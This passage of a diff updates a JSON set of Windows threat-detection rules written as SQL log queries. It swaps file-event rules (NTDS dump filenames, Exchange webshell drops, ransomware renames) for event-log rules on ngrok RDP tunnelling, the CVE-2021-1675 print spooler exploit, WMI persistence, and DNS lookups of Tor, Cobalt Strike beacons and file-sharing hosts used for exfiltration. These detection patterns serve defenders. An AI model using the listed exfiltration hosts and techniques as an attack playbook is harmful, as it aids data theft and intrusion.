ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT (((RemoteName LIKE '%.azureedge.net/%' ESCAPE '\\' OR RemoteName LIKE '%.com/%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms/%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org/%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" + "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "title": "File Was Not Allowed To Run", + "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "author": "Pushkarev Dmitry", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Need tuning applocker or add exceptions in SIEM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_applocker_file_was_not_allowed_to_run.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Suspicious Appended Extension", - "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "status": "experimental", - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "author": "frack113", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "status": "test", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Backup software" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_rename_win_ransomware.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Rename Common File to DLL File", - "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "author": "frack113", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Application installation" + "Antivirus products" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_rename_win_not_dll_to_dll.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "author": "Florian Roth (Nextron Systems)", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "status": "experimental", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "SCR File Write Event", - "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "The installation of new screen savers by third party software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_new_src_file.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "OpenSSH Server Listening On Socket", + "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "author": "mdecrevoisier", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.lateral_movement", + "attack.t1021.004" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Legitimate administrator activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_sshd_openssh_server_listening_on_socket.yml" }, { - "title": "Advanced IP Scanner - File Event", - "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "status": "test", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "@ROxPinTeddy", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Legitimate administrative use" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" ], - "filename": "file_event_win_advanced_ip_scanner.yml" + "filename": "win_wmi_persistence.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1219" + "attack.t1071.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Creation of an Executable by an Executable", - "id": "297afac9-5d02-4138-8c58-b977bac60556", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detects the creation of an executable by another executable", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Software installers", - "Update utilities", - "32bit applications launching their 64bit versions" + "Rare legitimate access to anonfiles.com" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%.exe' ESCAPE '\\' AND TargetFilename LIKE '%.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\cleanmgr.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\dxgiadaptercache.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\Dism.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%:\\\\WUDownloadCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WindowsUpdateBox.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\WindowsUpdateBox.Exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\Microsoft\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 